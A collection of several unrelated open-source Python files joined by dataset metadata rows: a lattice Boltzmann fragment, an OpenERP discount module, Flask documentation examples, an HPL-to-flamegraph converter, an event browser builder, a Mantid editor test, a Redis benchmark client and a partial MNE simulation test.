FEQ[5,:,:,:]=tDENSITY*(1.0 + 3.0*UX + 9.0/2.0*UX**2 - T1)
FEQ[6,:,:,:]=tDENSITY*(1.0 - 3.0*UX + 9.0/2.0*UX**2 - T1)
# next-nearest neighbours
T1 = 3.0*U_SQU/2.0
tDENSITY = t3*DENSITY
U8 = UX+UY
FEQ[7,:,:,:] =tDENSITY*(1.0 + 3.0*U8 + 9.0/2.0*(U8)**2 - T1)
U9 = UX-UY
FEQ[8,:,:,:] =tDENSITY*(1.0 + 3.0*U9 + 9.0/2.0*(U9)**2 - T1)
U10 = -UX+UY
FEQ[9,:,:,:] =tDENSITY*(1.0 + 3.0*U10 + 9.0/2.0*(U10)**2 - T1)
U8 *= -1.0
FEQ[10,:,:,:]=tDENSITY*(1.0 + 3.0*U8 + 9.0/2.0*(U8)**2 - T1)
U12 = UX+UZ
FEQ[11,:,:,:]=tDENSITY*(1.0 + 3.0*U12 + 9.0/2.0*(U12)**2 - T1)
        U12 *= -1.0  # FEQ[14] is the direction opposite to FEQ[11] (cf. U8/U13/U16/U17)
FEQ[14,:,:,:]=tDENSITY*(1.0 + 3.0*U12 + 9.0/2.0*(U12)**2 - T1)
U13 = UX-UZ
FEQ[12,:,:,:]=tDENSITY*(1.0 + 3.0*U13 + 9.0/2.0*(U13)**2 - T1)
U13 *= -1.0
FEQ[13,:,:,:]=tDENSITY*(1.0 + 3.0*U13 + 9.0/2.0*(U13)**2 - T1)
U16 = UY+UZ
FEQ[15,:,:,:]=tDENSITY*(1.0 + 3.0*U16 + 9.0/2.0*(U16)**2 - T1)
U17 = UY-UZ
FEQ[16,:,:,:]=tDENSITY*(1.0 + 3.0*U17 + 9.0/2.0*(U17)**2 - T1)
U17 *= -1.0
FEQ[17,:,:,:]=tDENSITY*(1.0 + 3.0*U17 + 9.0/2.0*(U17)**2 - T1)
U16 *= -1.0
FEQ[18,:,:,:]=tDENSITY*(1.0 + 3.0*U16 + 9.0/2.0*(U16)**2 - T1)
F *= (1.0-omega)
F += omega * FEQ
#Densities bouncing back at next timestep
F[1:,:,:,:] *= BOUNDi[np.newaxis,:,:,:]
F[1:,:,:,:] += BB[1:,:,:,:]
del BB
del T1
del UX, UY, UZ
del U_SQU
del DENSITY, tDENSITY
del U8, U9, U10, U12, U13, U16, U17
if util.Benchmark().bohrium:
np.flush()
B.stop()
B.pprint()
if B.outputfn:
B.tofile(B.outputfn, {'res': UX})
"""
import matplotlib.pyplot as plt
UX *= -1
plt.hold(True)
plt.quiver(UY[:,:,4],UX[:,:,4], pivot='middle')
plt.imshow(BOUND[:,:,4])
plt.show()
"""
if __name__ == "__main__":
main()
| lgpl-3.0 | -477,230,179,552,261,200 | 30.070922 | 88 | 0.351518 | false | 2.279396 | false | false | false |
Micronaet/micronaet-mx | sale_discount/model/discount.py | 1 | 4156 | # -*- coding: utf-8 -*-
###############################################################################
#
# Copyright (C) 2001-2014 Micronaet SRL (<http://www.micronaet.it>).
#
# Original module for stock.move from:
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
import os
import sys
import logging
import openerp
import openerp.netsvc as netsvc
import openerp.addons.decimal_precision as dp
from openerp.osv import fields, osv, expression, orm
from datetime import datetime, timedelta
from dateutil.relativedelta import relativedelta
from openerp import SUPERUSER_ID
from openerp import tools
from openerp.tools.translate import _
from openerp.tools.float_utils import float_round as round
from openerp.tools import (DEFAULT_SERVER_DATE_FORMAT,
DEFAULT_SERVER_DATETIME_FORMAT,
DATETIME_FORMATS_MAP,
float_compare)
_logger = logging.getLogger(__name__)
discount_type = [
('integrated', 'Integrate'),
('inline', 'Inline'),
('row', 'Different row'),
]
class ResPartner(orm.Model):
    ''' Extra elements for managing discounts
'''
_inherit = 'res.partner'
def onchange_discount(self, cr, uid, ids, discount_scale, discount,
mode='scale', context=None):
        ''' Update the discount depending on the scale (or reset the scale)
'''
res = {'value': {}}
try:
if mode == 'scale':
scale = discount_scale.split('+')
discount_scale_cleaned = ''
rate = 100.0
for i in scale:
i = float(i.strip().replace('%', '').replace(',', '.'))
rate -= rate * i / 100.0
discount_scale_cleaned += "%s%5.2f%s " % (
'+' if discount_scale_cleaned else '', i, '%')
res['value']['discount'] = 100.0 - rate
res['value']['discount_scale'] = discount_scale_cleaned
else: # 'discount':
pass #res['value']['discount_scale'] = False
except:
res['warning'] = {
'title': _('Discount error'),
'message': _('Scale value not correct!'),
}
return res
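    # Illustrative example (values made up): with mode='scale' and a
    # discount_scale of "10+5", the loop above chains the two discounts
    # (100 -> 90 -> 85.5), so 'discount' becomes 14.5 and 'discount_scale'
    # is rewritten in the normalised form "10.00% + 5.00%".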
_columns = {
'discount_type': fields.selection(discount_type, 'Discount type'),
'discount_scale': fields.char('Discount scale', size=35),
'discount': fields.float('Discount', digits=(
            16, 2), help='Automatically calculated if a scale is indicated'),
}
_defaults = {
'discount_type': lambda *x: 'integrated',
}
class SaleOrderLine(orm.Model):
    ''' Add discount type and scale to sale order lines
'''
_inherit = 'sale.order.line'
def onchange_discount(self, cr, uid, ids, discount_scale, discount,
mode='scale', context=None):
''' Call onchange in partner
'''
return self.pool.get('res.partner').onchange_discount(cr, uid, ids,
discount_scale=discount_scale, discount=discount, mode=mode,
context=context)
_columns = {
'discount_type': fields.selection(discount_type, 'Discount type'),
'discount_scale': fields.char('Discount scale', size=15),
}
_defaults = {
'discount_type': lambda *x: 'integrated',
}
| agpl-3.0 | 6,720,405,219,061,504,000 | 34.220339 | 79 | 0.568816 | false | 4.311203 | false | false | false |
soulnothing/FlaskReDoc | example/exampleapplication.py | 1 | 3734 | import sys
import re
import json
from flask import current_app, render_template, render_template_string
from flask import Flask, jsonify
from threading import Thread
from flaskredoc import ReDoc
from werkzeug.wsgi import DispatcherMiddleware
from werkzeug.serving import run_simple
from werkzeug.debug import DebuggedApplication
import os
"""
This is an example application; it does not actually do anything real.
All responses are canned and sometimes randomized JSON structures. It is
meant to show the ease of documenting your application.
"""
resp_folder=os.path.join(os.getcwd(), 'responses')
app = Flask(__name__)
app.debug = True
@app.route('/')
def blah():
'''
    The entry point function; it just returns a string.
    It has no real purpose beyond serving as a documented example.
* @CODE 200: A successful response.
* @RESPONSE: sample.txt, Example Successful Response, 200 OK
'''
return "This is an example application, please see the help section"
@app.route('/db/user/<username>')
@app.route('/db/user', defaults={"username": None})
def query_user(username):
"""
Returns a json structure containing user information.
    Takes in a username either as a GET parameter or in the
url structure. It retrieves basic information including the username,
group, user id, and location. Case of the user name does not matter,
as the provided user name is forced to lower case prior to querying.
* @RESPONSE: db-user-query.json, Example Successful response, 200 OK
* query: /db/users/bob
* description: Querying for the user bob and gathering user information.
* @RESPONSE: db-users-query-error.json, Example User Does not exist, 400 BAD Response
* query: /db/users/gizmo
* description: Querying a non existent user.
* @RESPONSE: db-users-query-no-param.json, Example Invalid Parameters, 400 BAD Response
* query: /db/users
* description: No username is specified in the query.
* @GROUP: Database, User Management
* @URL 1 username: Specify the username to retrieve from the database.
* @GET username: Specify the username to retrieve from the database.
* @CODE 200: Successful response
* @CODE 400: Bad response queried user does not exist, or no parameters provided.
"""
return "user query"
@app.route('/db/users')
def query_users():
"""
Returns a list of all users.
Queries the database and returns an array
of all valid user names from the database.
* @RESPONSE: db-query-users.json, Example Successful Response, 200 OK
* query: /db/users
* description: A query to list all users.
* @RESPONSE: db-query-users-location.json, Example Successful Location Response, 200 OK
* query: /db/users?location=Dallas
      * description: Query the Dallas location for its users.
* @RESPONSE: db-query-users-group.xml, Example Successful Group Response, 200 OK
* query: /db/users?group=it
      * description: Query the group 'it' for its users. Due to antiquated systems this is in XML.
* @GET group: Specify the group, you wish to get a list of users for.
* @GET location: Specify the location you wish to get a list of users for.
* @CODE 200: A successful response.
"""
return "users"
if __name__ == "__main__":
doc = ReDoc(app=app, respfolder=os.path.join(os.getcwd(), 'responses'))
doc.doc_app()
frontend = doc.create_frontend()
frontend.debug = True
api = doc.create_help_api()
api.debug = True
application = DispatcherMiddleware(app, {'/help': frontend,
'/help/api': api
})
run_simple('0.0.0.0', 5000, application, use_reloader=True, use_debugger=True)
| mit | 8,131,353,653,670,957,000 | 37.895833 | 99 | 0.697108 | false | 3.959703 | false | false | false |
cykl/hprof2flamegraph | stackcollapse_hpl.py | 1 | 8006 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2014, Clément MATHIEU
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from __future__ import print_function
import struct
import collections
import sys
import re
Method = collections.namedtuple('Method', ['id', 'file_name', 'class_name', 'method_name'])
Trace = collections.namedtuple('Trace', ['thread_id', 'frame_count', 'frames'])
Frame = collections.namedtuple('Frame', ['bci', 'line_no', 'method_id'])
AGENT_ERRORS = [
"No Java Frames[ERR=0]",
"No class load[ERR=-1]",
"GC Active[ERR=-2]",
"Unknown not Java[ERR=-3]",
"Not walkable not Java[ERR=-4]",
"Unknown Java[ERR=-5]",
"Not walkable Java[ERR=-6]",
"Unknown state[ERR=-7]",
"Thread exit[ERR=-8]",
"Deopt[ERR=-9]",
"Safepoint[ERR=-10]",
]
def parse_hpl_string(fh):
(length,) = struct.unpack('>i', fh.read(4))
(val,) = struct.unpack('>%ss' % length, fh.read(length))
return val.decode('utf-8')
def parse_hpl(filename):
traces = []
methods = {}
for (index, error) in enumerate(AGENT_ERRORS):
method_id = -1 - index
methods[method_id] = Method(method_id, "", "/Error/", error)
with open(filename, 'rb') as fh:
while True:
marker_str = fh.read(1)
if not marker_str:
break
(marker,) = struct.unpack('>b', marker_str)
if marker == 0:
break
elif marker == 1 or marker == 11:
(frame_count, thread_id) = struct.unpack('>iQ', fh.read(4 + 8))
# marker is 11, read the time
if marker == 11:
(time_sec, time_nano) = struct.unpack('>QQ', fh.read(8+8))
if frame_count > 0:
traces.append(Trace(thread_id, frame_count, []))
else: # Negative frame_count are used to report error
if abs(frame_count) > len(AGENT_ERRORS):
method_id = frame_count - 1
methods[method_id] = Method(method_id, "Unknown err[ERR=%s]" % frame_count)
frame = Frame(None, None, frame_count - 1)
traces.append(Trace(thread_id, 1, [frame]))
elif marker == 2:
(bci, method_id) = struct.unpack('>iQ', fh.read(4 + 8))
frame = Frame(bci, None, method_id)
traces[-1].frames.append(frame)
elif marker == 21:
(bci, line_no, method_id) = struct.unpack('>iiQ', fh.read(4 + 4 + 8))
if line_no < 0: # Negative line_no are used to report that line_no is not available (-100 & -101)
line_no = None
frame = Frame(bci, line_no, method_id)
traces[-1].frames.append(frame)
elif marker == 3:
(method_id,) = struct.unpack('>Q', fh.read(8))
file_name = parse_hpl_string(fh)
class_name = parse_hpl_string(fh)
method_name = parse_hpl_string(fh)
methods[method_id] = Method(method_id, file_name, class_name, method_name)
elif marker == 31:
(method_id,) = struct.unpack('>Q', fh.read(8))
file_name = parse_hpl_string(fh)
class_name = parse_hpl_string(fh)
class_name_generic = parse_hpl_string(fh)
method_name = parse_hpl_string(fh)
method_signature = parse_hpl_string(fh)
method_signature_generic = parse_hpl_string(fh)
methods[method_id] = Method(method_id, file_name, class_name, method_name)
elif marker == 4: # 4 means thread meta, not useful in flame graph
(thread_id,) = struct.unpack('>Q', fh.read(8))
thread_name = parse_hpl_string(fh)
else:
raise Exception("Unexpected marker: %s at offset %s" % (marker, fh.tell()))
return traces, methods
def abbreviate_package(class_name):
match_object = re.match(r'(?P<package>.*\.)(?P<remainder>[^.]+\.[^.]+)$', class_name)
if match_object is None:
return class_name
shortened_pkg = re.sub(r'(\w)\w*', r'\1', match_object.group('package'))
return "%s%s" % (shortened_pkg, match_object.group('remainder'))
def get_method_name(method, shorten_pkgs):
class_name = method.class_name[1:-1].replace('/', '.')
if shorten_pkgs:
class_name = abbreviate_package(class_name)
method_name = class_name
method_name += '.' + method.method_name
return method_name
def format_frame(frame, method, discard_lineno, shorten_pkgs):
formatted_frame = get_method_name(method, shorten_pkgs)
if not discard_lineno and frame.line_no:
formatted_frame += ':' + str(frame.line_no)
return formatted_frame
def main(argv=None, out=sys.stdout):
import argparse
parser = argparse.ArgumentParser(description='Convert an hpl file into Flamegraph collapsed stacks')
parser.add_argument('hpl_file', metavar='FILE', type=str, nargs=1, help='A hpl file')
parser.add_argument('--discard-lineno', dest='discard_lineno', action='store_true', help='Remove line numbers')
parser.add_argument('--discard-thread', dest='discard_thread', action='store_true', help='Remove thread info')
parser.add_argument('--shorten-pkgs', dest='shorten_pkgs', action='store_true', help='Shorten package names')
parser.add_argument('--skip-trace-on-missing-frame', dest='skip_trace_on_missing_frame', action='store_true', help='Continue processing even if frames are missing')
args = parser.parse_args(argv)
filename = args.hpl_file[0]
(traces, methods) = parse_hpl(filename)
folded_stacks = collections.defaultdict(int)
for trace in traces:
frames = []
skip_trace = False
for frame in trace.frames:
if args.skip_trace_on_missing_frame and not frame.method_id in methods:
sys.stderr.write("skipped missing frame %s\n" % frame.method_id)
skip_trace = True
break
frames.append(format_frame(
frame,
methods[frame.method_id],
args.discard_lineno,
args.shorten_pkgs
))
if skip_trace:
continue
if not args.discard_thread:
frames.append('Thread %s' % trace.thread_id)
folded_stack = ';'.join(reversed(frames))
folded_stacks[folded_stack] += 1
for folded_stack in sorted(folded_stacks):
sample_count = folded_stacks[folded_stack]
print("%s %s" % (folded_stack, sample_count), file=out)
return 0
if __name__ == '__main__':
main()
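# Usage sketch (illustrative, not part of the original script): typical
# invocation and the collapsed-stack format it writes, which flamegraph.pl
# consumes directly. Thread frames come first unless --discard-thread is given.
#
#   python stackcollapse_hpl.py --shorten-pkgs recording.hpl > stacks.folded
#   flamegraph.pl stacks.folded > flamegraph.svg
#
# Each output line is "frame1;frame2;...;frameN sample_count", for example:
#   Thread 12;c.e.service.Main.run:42;c.e.service.Worker.step:17 358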
| bsd-2-clause | 1,047,224,140,835,399,000 | 39.226131 | 168 | 0.602998 | false | 3.78666 | false | false | false |
AdrienGuille/pyMABED | build_event_browser.py | 1 | 3036 | # coding: utf-8
# std
import time
import argparse
import os
import shutil
# web
from flask import Flask, render_template
from flask_frozen import Freezer
# mabed
import mabed.utils as utils
__author__ = "Adrien Guille"
__email__ = "[email protected]"
event_browser = Flask(__name__, static_folder='browser/static', template_folder='browser/templates')
@event_browser.route('/')
def index():
return render_template('template.html',
events=event_descriptions,
event_impact='[' + ','.join(impact_data) + ']',
k=mabed.k,
theta=mabed.theta,
sigma=mabed.sigma)
if __name__ == '__main__':
p = argparse.ArgumentParser(description='Build event browser')
p.add_argument('i', metavar='input', type=str, help='Input pickle file')
p.add_argument('--o', metavar='output', type=str, help='Output html directory', default=None)
args = p.parse_args()
print('Loading events from %s...' % args.i)
mabed = utils.load_events(args.i)
# format data
print('Preparing data...')
event_descriptions = []
impact_data = []
formatted_dates = []
for i in range(0, mabed.corpus.time_slice_count):
formatted_dates.append(int(time.mktime(mabed.corpus.to_date(i).timetuple()))*1000)
for event in mabed.events:
mag = event[0]
main_term = event[2]
raw_anomaly = event[4]
formatted_anomaly = []
time_interval = event[1]
related_terms = []
for related_term in event[3]:
related_terms.append(related_term[0]+' ('+str("{0:.2f}".format(related_term[1]))+')')
event_descriptions.append((mag,
str(mabed.corpus.to_date(time_interval[0])),
str(mabed.corpus.to_date(time_interval[1])),
main_term,
', '.join(related_terms)))
for i in range(0, mabed.corpus.time_slice_count):
value = 0
if time_interval[0] <= i <= time_interval[1]:
value = raw_anomaly[i]
if value < 0:
value = 0
formatted_anomaly.append('['+str(formatted_dates[i])+','+str(value)+']')
impact_data.append('{"key":"' + main_term + '", "values":[' + ','.join(formatted_anomaly) + ']}')
if args.o is not None:
if os.path.exists(args.o):
shutil.rmtree(args.o)
os.makedirs(args.o)
print('Freezing event browser into %s...' % args.o)
event_browser_freezer = Freezer(event_browser)
event_browser.config.update(
FREEZER_DESTINATION=args.o,
FREEZER_RELATIVE_URLS=True,
)
event_browser.debug = False
event_browser.config['ASSETS_DEBUG'] = False
event_browser_freezer.freeze()
print('Done.')
else:
event_browser.run(debug=False, host='localhost', port=2016)
| mit | -3,382,823,232,691,615,000 | 34.717647 | 105 | 0.553689 | false | 3.657831 | false | false | false |
mganeva/mantid | qt/python/mantidqt/widgets/codeeditor/test/test_multifileinterpreter.py | 1 | 2516 | # Mantid Repository : https://github.com/mantidproject/mantid
#
# Copyright © 2017 ISIS Rutherford Appleton Laboratory UKRI,
# NScD Oak Ridge National Laboratory, European Spallation Source
# & Institut Laue - Langevin
# SPDX - License - Identifier: GPL - 3.0 +
# This file is part of the mantid workbench.
#
#
from __future__ import (absolute_import, unicode_literals)
import unittest
from mantid.py3compat import mock
from mantidqt.utils.qt.testing import GuiTest
from mantidqt.utils.qt.testing.qt_widget_finder import QtWidgetFinder
from mantidqt.widgets.codeeditor.multifileinterpreter import MultiPythonFileInterpreter
MANTID_API_IMPORT = "from mantid.simpleapi import *\n"
PERMISSION_BOX_FUNC = ('mantidqt.widgets.codeeditor.scriptcompatibility.'
'permission_box_to_prepend_import')
class MultiPythonFileInterpreterTest(GuiTest, QtWidgetFinder):
def test_default_contains_single_editor(self):
widget = MultiPythonFileInterpreter()
self.assertEqual(1, widget.editor_count)
def test_add_editor(self):
widget = MultiPythonFileInterpreter()
self.assertEqual(1, widget.editor_count)
widget.append_new_editor()
self.assertEqual(2, widget.editor_count)
def test_open_file_in_new_tab_import_added(self):
test_string = "Test file\nLoad()"
widget = MultiPythonFileInterpreter()
mock_open_func = mock.mock_open(read_data=test_string)
with mock.patch(widget.__module__ + '.open', mock_open_func, create=True):
with mock.patch(PERMISSION_BOX_FUNC, lambda: True):
widget.open_file_in_new_tab(test_string)
self.assertEqual(widget.current_editor().editor.isModified(), True,
msg="Script not marked as modified.")
self.assertIn(MANTID_API_IMPORT, widget.current_editor().editor.text(),
msg="'simpleapi' import not added to script.")
def test_open_file_in_new_tab_no_import_added(self):
test_string = "Test file\n"
widget = MultiPythonFileInterpreter()
mock_open_func = mock.mock_open(read_data=test_string)
with mock.patch(widget.__module__ + '.open', mock_open_func, create=True):
with mock.patch(PERMISSION_BOX_FUNC, lambda: True):
widget.open_file_in_new_tab(test_string)
self.assertNotIn(MANTID_API_IMPORT,
widget.current_editor().editor.text())
if __name__ == '__main__':
unittest.main()
| gpl-3.0 | -4,618,802,130,108,384,000 | 40.933333 | 87 | 0.675278 | false | 3.62536 | true | false | false |
matus-stehlik/glowing-batman | base/templatetags/roots_tags.py | 1 | 1874 | from django import template
from django.core.urlresolvers import reverse
from django.conf import settings
from django.template.base import TemplateSyntaxError
register = template.Library()
@register.simple_tag
def url_active(request, urls, *args, **kwargs):
if request.path in (reverse(url, args=list(*args), kwargs=dict(**kwargs))
for url in urls.split()):
return "active"
else:
return ""
@register.filter
def remove_uncomplete_latex(text):
    # An even number of segments separated by $$ means an unterminated
    # display equation
if len(text.split('$$')) % 2 == 0:
# Return the original text
return '$$'.join(text.split('$$')[:-1])
elif len(text.split('$')) % 2 == 0:
return '$'.join(text.split('$')[:-1])
else:
return text
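# Worked example (illustrative addition, not part of the original file): an odd
# number of '$$'-separated segments means every display equation was closed; an
# even number means the last '$$' opened an equation that never closed, so the
# text is truncated at that marker. The same rule is then applied to inline '$'.
def _remove_uncomplete_latex_example():
    # Balanced delimiters: returned unchanged.
    complete = remove_uncomplete_latex("Energy: $$E = mc^2$$ done")
    # Unterminated display equation: truncated to "Energy: ".
    truncated = remove_uncomplete_latex("Energy: $$E = mc^2")
    return complete, truncated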
class DefineNode(template.Node):
def __init__(self, name, nodelist):
self.name = name
self.nodelist = nodelist
def __repr__(self):
return "<DefineNode>"
def render(self, context):
context[self.name] = self.nodelist.render(context)
return ''
@register.tag
def define(parser, token):
"""
Adds a name to the context for referencing an arbitrarily defined block
of template code.
For example:
{% define my_block %}
This is the content.
{% enddefine %}
Now anywhere in the template:
{{ my_block }}
"""
bits = list(token.split_contents())
if len(bits) != 2:
raise TemplateSyntaxError("Expected format is: {% define variable %}")
name = bits[1]
nodelist = parser.parse(('enddefine',))
parser.delete_first_token()
return DefineNode(name, nodelist)
@register.filter
def access(value, arg):
return value.get(arg, {})
@register.simple_tag
def settings_value(name):
return getattr(settings, name, "")
| mit | -6,420,556,990,031,565,000 | 22.425 | 78 | 0.61953 | false | 3.978769 | false | false | false |
lzhjie/benchmark | client_redis.py | 1 | 1166 | # coding: utf-8
# Copyright (C) zhongjie luo <[email protected]>
import redis
from db_bench import DbConnection, multi_process_bench, Options
class StrictRedis(DbConnection):
def __init__(self, options):
super(StrictRedis, self).__init__(options)
self.__db = 0
self.__client = None
def connect(self):
self.__client = redis.StrictRedis(self.host, self.port, self.__db)
def disconnect(self):
self.__client = None
def insert(self, record):
k, v = record[0]
return self.__client.set(str(k), str(v), nx=True) == True
def search(self, record):
k, v = record[0]
return self.__client.get(str(k)) == str(v)
def delete(self, record):
k, v = record[0]
return self.__client.delete(str(k)) == True
def tear_down(self):
self.__client.flushdb()
def api_example():
pass
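# Illustrative sketch (added, not part of the original file) of the raw
# redis-py calls that the StrictRedis wrapper above maps onto; host and port
# values here are assumptions for demonstration only.
def _redis_api_example(host="127.0.0.1", port=6379):
    client = redis.StrictRedis(host, port, 0)
    client.set("key", "value", nx=True)    # insert only when the key is absent
    found = client.get("key")              # stored value, or None if missing
    client.delete("key")
    client.flushdb()
    return found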
if __name__ == "__main__":
option = Options()
option.set("port", 6379)
if option.parse_option() is False:
exit(100)
print(option)
result = multi_process_bench(option, StrictRedis)
# print result
| mit | 9,135,346,619,652,901,000 | 22.808511 | 74 | 0.56518 | false | 3.544073 | false | false | false |
jaeilepp/mne-python | mne/simulation/tests/test_raw.py | 1 | 13124 | # Authors: Mark Wronkiewicz <[email protected]>
# Yousra Bekhti <[email protected]>
# Eric Larson <[email protected]>
#
# License: BSD (3-clause)
import os.path as op
import warnings
from copy import deepcopy
import numpy as np
from numpy.testing import assert_allclose, assert_array_equal
from nose.tools import assert_true, assert_raises, assert_equal
from mne import (read_source_spaces, pick_types, read_trans, read_cov,
make_sphere_model, create_info, setup_volume_source_space,
find_events, Epochs, fit_dipole, transform_surface_to,
make_ad_hoc_cov, SourceEstimate, setup_source_space)
from mne.chpi import _calculate_chpi_positions, read_head_pos, _get_hpi_info
from mne.tests.test_chpi import _assert_quats
from mne.datasets import testing
from mne.simulation import simulate_sparse_stc, simulate_raw
from mne.io import read_raw_fif, RawArray
from mne.time_frequency import psd_welch
from mne.utils import _TempDir, run_tests_if_main, slow_test
warnings.simplefilter('always')
data_path = testing.data_path(download=False)
raw_fname = op.join(data_path, 'MEG', 'sample', 'sample_audvis_trunc_raw.fif')
cov_fname = op.join(data_path, 'MEG', 'sample',
'sample_audvis_trunc-cov.fif')
trans_fname = op.join(data_path, 'MEG', 'sample',
'sample_audvis_trunc-trans.fif')
subjects_dir = op.join(data_path, 'subjects')
bem_path = op.join(subjects_dir, 'sample', 'bem')
src_fname = op.join(bem_path, 'sample-oct-2-src.fif')
bem_fname = op.join(bem_path, 'sample-320-320-320-bem-sol.fif')
raw_chpi_fname = op.join(data_path, 'SSS', 'test_move_anon_raw.fif')
pos_fname = op.join(data_path, 'SSS', 'test_move_anon_raw_subsampled.pos')
def _make_stc(raw, src):
"""Helper to make a STC."""
seed = 42
sfreq = raw.info['sfreq'] # Hz
tstep = 1. / sfreq
n_samples = len(raw.times) // 10
times = np.arange(0, n_samples) * tstep
stc = simulate_sparse_stc(src, 10, times, random_state=seed)
return stc
def _get_data():
"""Helper to get some starting data."""
# raw with ECG channel
raw = read_raw_fif(raw_fname).crop(0., 5.0).load_data()
data_picks = pick_types(raw.info, meg=True, eeg=True)
other_picks = pick_types(raw.info, meg=False, stim=True, eog=True)
picks = np.sort(np.concatenate((data_picks[::16], other_picks)))
raw = raw.pick_channels([raw.ch_names[p] for p in picks])
raw.info.normalize_proj()
ecg = RawArray(np.zeros((1, len(raw.times))),
create_info(['ECG 063'], raw.info['sfreq'], 'ecg'))
for key in ('dev_head_t', 'buffer_size_sec', 'highpass', 'lowpass', 'dig'):
ecg.info[key] = raw.info[key]
raw.add_channels([ecg])
src = read_source_spaces(src_fname)
trans = read_trans(trans_fname)
sphere = make_sphere_model('auto', 'auto', raw.info)
stc = _make_stc(raw, src)
return raw, src, stc, trans, sphere
@testing.requires_testing_data
def test_simulate_raw_sphere():
"""Test simulation of raw data with sphere model."""
seed = 42
raw, src, stc, trans, sphere = _get_data()
assert_true(len(pick_types(raw.info, meg=False, ecg=True)) == 1)
# head pos
head_pos_sim = dict()
# these will be at 1., 2., ... sec
shifts = [[0.001, 0., -0.001], [-0.001, 0.001, 0.]]
for time_key, shift in enumerate(shifts):
# Create 4x4 matrix transform and normalize
temp_trans = deepcopy(raw.info['dev_head_t'])
temp_trans['trans'][:3, 3] += shift
head_pos_sim[time_key + 1.] = temp_trans['trans']
#
# Test raw simulation with basic parameters
#
raw_sim = simulate_raw(raw, stc, trans, src, sphere, read_cov(cov_fname),
head_pos=head_pos_sim,
blink=True, ecg=True, random_state=seed)
raw_sim_2 = simulate_raw(raw, stc, trans_fname, src_fname, sphere,
cov_fname, head_pos=head_pos_sim,
blink=True, ecg=True, random_state=seed)
assert_array_equal(raw_sim_2[:][0], raw_sim[:][0])
# Test IO on processed data
tempdir = _TempDir()
test_outname = op.join(tempdir, 'sim_test_raw.fif')
raw_sim.save(test_outname)
raw_sim_loaded = read_raw_fif(test_outname, preload=True)
assert_allclose(raw_sim_loaded[:][0], raw_sim[:][0], rtol=1e-6, atol=1e-20)
del raw_sim, raw_sim_2
# with no cov (no noise) but with artifacts, most time periods should match
# but the EOG/ECG channels should not
for ecg, eog in ((True, False), (False, True), (True, True)):
raw_sim_3 = simulate_raw(raw, stc, trans, src, sphere,
cov=None, head_pos=head_pos_sim,
blink=eog, ecg=ecg, random_state=seed)
raw_sim_4 = simulate_raw(raw, stc, trans, src, sphere,
cov=None, head_pos=head_pos_sim,
blink=False, ecg=False, random_state=seed)
picks = np.arange(len(raw.ch_names))
diff_picks = pick_types(raw.info, meg=False, ecg=ecg, eog=eog)
these_picks = np.setdiff1d(picks, diff_picks)
close = np.isclose(raw_sim_3[these_picks][0],
raw_sim_4[these_picks][0], atol=1e-20)
assert_true(np.mean(close) > 0.7)
far = ~np.isclose(raw_sim_3[diff_picks][0],
raw_sim_4[diff_picks][0], atol=1e-20)
assert_true(np.mean(far) > 0.99)
del raw_sim_3, raw_sim_4
# make sure it works with EEG-only and MEG-only
raw_sim_meg = simulate_raw(raw.copy().pick_types(meg=True, eeg=False),
stc, trans, src, sphere, cov=None,
ecg=True, blink=True, random_state=seed)
raw_sim_eeg = simulate_raw(raw.copy().pick_types(meg=False, eeg=True),
stc, trans, src, sphere, cov=None,
ecg=True, blink=True, random_state=seed)
raw_sim_meeg = simulate_raw(raw.copy().pick_types(meg=True, eeg=True),
stc, trans, src, sphere, cov=None,
ecg=True, blink=True, random_state=seed)
assert_allclose(np.concatenate((raw_sim_meg[:][0], raw_sim_eeg[:][0])),
raw_sim_meeg[:][0], rtol=1e-7, atol=1e-20)
del raw_sim_meg, raw_sim_eeg, raw_sim_meeg
# check that different interpolations are similar given small movements
raw_sim = simulate_raw(raw, stc, trans, src, sphere, cov=None,
head_pos=head_pos_sim, interp='linear')
raw_sim_hann = simulate_raw(raw, stc, trans, src, sphere, cov=None,
head_pos=head_pos_sim, interp='hann')
assert_allclose(raw_sim[:][0], raw_sim_hann[:][0], rtol=1e-1, atol=1e-14)
del raw_sim, raw_sim_hann
# Make impossible transform (translate up into helmet) and ensure failure
head_pos_sim_err = deepcopy(head_pos_sim)
head_pos_sim_err[1.][2, 3] -= 0.1 # z trans upward 10cm
assert_raises(RuntimeError, simulate_raw, raw, stc, trans, src, sphere,
ecg=False, blink=False, head_pos=head_pos_sim_err)
assert_raises(RuntimeError, simulate_raw, raw, stc, trans, src,
bem_fname, ecg=False, blink=False,
head_pos=head_pos_sim_err)
# other degenerate conditions
assert_raises(TypeError, simulate_raw, 'foo', stc, trans, src, sphere)
